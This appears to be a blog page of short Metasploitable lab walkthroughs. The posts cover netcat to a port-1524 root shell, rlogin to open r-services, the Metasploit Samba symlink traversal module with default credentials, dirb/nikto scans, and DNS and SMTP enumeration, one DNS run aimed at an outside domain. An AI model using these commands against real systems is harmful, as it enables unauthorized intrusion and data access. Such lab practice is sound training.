Skip to main content

Posts

Explot Metasploitable Root shell

                             Metasploitable Root shell 1524/tcp             open                 shell              Metasploitable root shell This was a curiousity… My first attempt was to attempt using rlogin to connect to the port, which did not appear to work correctly, though did seem to work enough to return part of a prompt to the user: root@kali:~# rlogin -p 1524 target oot@metasploitable:/# My next approach was to attempt a simple netcat connection to the host, which ended up being successful: root@kali:~# nc -v target 1524 root@metasploitable:/# id                                                                                   Written By Sanjay kumar                                                                                                 https://www.instagram.com/sanjayer111/                                                           https://www.facebook.com/mang786                                                                https://www.linkedin.com
Recent posts

Exploit and connect to port 512 ,513, and 514

               Exploit and connect to port 512 ,513, and 514 ༄ Unix Basics      TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured       to allow remote access from any host (a standard ".rhosts + +" situation).       To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and      run the following command as your local root user. If you are prompted for an SSH key,      this means the rsh-client tools have not been installed and Ubuntu is defaulting to       using  SSH. 🔂 Step-1:               First type "nmap -v <victim ip>" 🔄 Step-2:               type "rlogin  -l <user account> <ip address of victim>                                                                          by Er. SANJAY KUMAR                                                                                                            sanjayyadav11210@gmail.com

Samba exploit

                                  Samba exploit     ---> Here tmp is available so check it is connetable or not Step 1 : open metasploit Syep 2 : use auxiliary/admin/smb/samba_symlink_traversal auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp msf auxiliary(samba_symlink_traversal) > exploit       Step 3 :        You can get [*] \\192.168.1.5\tmp\rootfs\   so smbclient //192.168.1.5/tmp Enter password metasploit 2 --> msfadmin                                           by Er. SANJAY KUMAR                                                                    sanjayyadav11210@gmail.com  

exploit rpcbind

                            exploit rpcbind with nfs What is nfs?     Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems in 1984,allowing a user on a client computer to access files over a network in a manner similar to how local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. The Network File System is an open standard defined in RFCs, allowing anyone to implement the protocol. What is rpcbind?     The rpcbind utility maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number so it can communicate with the requested service. Because RPC-based services

How to findout directory of http port 80 and crack it

                     How to findout directory of http port 80 Method - 1 : using disturber dirb <url> Method 2 : nikto -host <web address:port> ex nikto -host http://192.168.1.5:80                                                                                       by Er. SANJAY KUMAR                                                                                                                       @sanjayer111

DNS Enumeration with Metasploit

                             DNS Enumerati on with Metasploit msf auxiliary( scanner/smtp/smtp_enum ) > use auxiliary/gather/enum_dns msf auxiliary( scanner/smtp/smtp_enum ) >show option msf auxiliary( gather/enum_dns ) > set DOMAIN 192.168.1.5 msf auxiliary( gather/enum_dns ) > run You can modify more . msf auxiliary(dns_enum) > set ENUM_AXFR false ENUM_AXFR => false msf auxiliary(dns_enum) > set ENUM_SRV false ENUM_SRV => false msf auxiliary(dns_enum) > set ENUM_STD false ENUM_STD => false msf auxiliary(dns_enum) > set ENUM_RVL true ENUM_RVL => true  msf auxiliary(dns_enum) > set ENUM_BRT true ENUM_BRT => true msf auxiliary(dns_enum) > set ENUM_STD false ENUM_STD => false msf auxiliary(dns_enum) > run msf auxiliary(dns_enum) > set DOMAIN hp.co DOMAIN => hp.co msf auxiliary(dns_enum) > run                                                                      by Er. SANJAY KUMAR                    

Exploit Smtp service port 25

                          Exploit SMTP service port 25   ✍️ Total 4 Ways we can exploit Smtp service ✍️ Type  -1 --> metasploit step -1 : Type msfconsole in terminal the it will open metasploit step - 2 type - search smtp step  3 : find auxiliary/scanner/smtp/smtp_enum then use it by use command  ex  msf> use auxiliary/scanner/smtp/smtp_enum   step  4 : Show options -- for requirement identity step  5 : set attribute using set command. ex set rhost <rhostip> Step 6 : exploit/run it using exploit command.                                                                             by Er. Sanjay Kumar ✍️ Type  -2 --> smtp-user-enum smtp-user-enum smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN, and RCPT TO commands. It could be adapted to work against other vu